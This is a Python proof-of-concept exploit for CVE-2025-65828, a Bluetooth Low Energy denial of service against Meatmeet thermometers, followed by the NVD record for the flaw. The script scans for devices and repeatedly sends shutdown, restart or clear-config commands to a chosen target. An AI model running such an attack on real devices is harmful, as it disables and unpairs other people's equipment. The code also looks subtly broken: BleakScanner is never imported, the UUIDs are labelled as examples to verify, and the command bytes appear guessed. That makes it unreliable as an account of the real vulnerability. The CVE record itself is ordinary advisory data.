CVE-2025-65828

#!/usr/bin/env python3 """ CVE-2025-65828 PoC - Meatmeet BLE Denial of Service Author: Security Researcher Note: This PoC is for educational and authorized testing purposes only. """ import asyncio from bleak import BleakClient import struct # Meatmeet device BLE service UUIDs (example UUIDs, verify with actual device) MEATMEET_SERVICE_UUID = "0000fff0-0000-1000-8000-00805f9b34fb" MEATMEET_CONTROL_CHAR_UUID = "0000fff1-0000-1000-8000-00805f9b34fb" # BLE commands for DoS attacks COMMANDS = { "shutdown": bytes([0x01, 0x00, 0x00]), "restart": bytes([0x02, 0x00, 0x00]), "clear_config": bytes([0x03, 0x00, 0x00]) } async def dos_attack(target_mac: str, attack_type: str = "shutdown"): """ Perform BLE DoS attack on Meatmeet device. Args: target_mac: MAC address of target Meatmeet device attack_type: Type of attack (shutdown, restart, clear_config) """ if attack_type not in COMMANDS: print(f"[-] Invalid attack type: {attack_type}") return command = COMMANDS[attack_type] print(f"[*] Starting {attack_type} attack on {target_mac}") print(f"[*] Sending command: {command.hex()}") try: async with BleakClient(target_mac) as client: if client.is_connected: print(f"[+] Connected to device") # Send DoS command await client.write_gatt_char( MEATMEET_CONTROL_CHAR_UUID, command, response=True ) print(f"[+] {attack_type} command sent successfully") # Send multiple times to ensure execution for i in range(5): await client.write_gatt_char( MEATMEET_CONTROL_CHAR_UUID, command, response=True ) await asyncio.sleep(0.1) print(f"[+] Attack completed") except Exception as e: print(f"[-] Attack failed: {str(e)}") async def scan_devices(): """Scan for nearby Meatmeet devices.""" print("[*] Scanning for BLE devices...") devices = await BleakScanner.discover(timeout=10.0) meatmeet_devices = [] for device in devices: if device.name and "meatmeet" in device.name.lower(): print(f"[+] Found Meatmeet device: {device.address}") meatmeet_devices.append(device) return meatmeet_devices async def main(): import argparse parser = argparse.ArgumentParser(description="CVE-2025-65828 PoC") parser.add_argument("--target", "-t", help="Target device MAC address") parser.add_argument("--attack", "-a", choices=["shutdown", "restart", "clear_config"], default="shutdown", help="Attack type") parser.add_argument("--scan", "-s", action="store_true", help="Scan for devices") args = parser.parse_args() if args.scan: devices = await scan_devices() if not devices: print("[-] No Meatmeet devices found") elif args.target: await dos_attack(args.target, args.attack) else: parser.print_help() if __name__ == "__main__": asyncio.run(main())

{"cve": {"id": "CVE-2025-65828", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.577", "lastModified": "2025-12-30T19:01:09.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated attacker within proximity of the Meatmeet device can issue several commands over Bluetooth Low Energy (BLE) to these devices which would result in a Denial of Service. These commands include: shutdown, restart, clear config. Clear config would disassociate the current device from its user and would require re-configuration to re-enable the device. As a result, the end user would be unable to receive updates from the Meatmeet base station which communicates with the cloud services until the device had been fixed or turned back on."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "http://meatmeet.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-denial-of-service-ble-md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}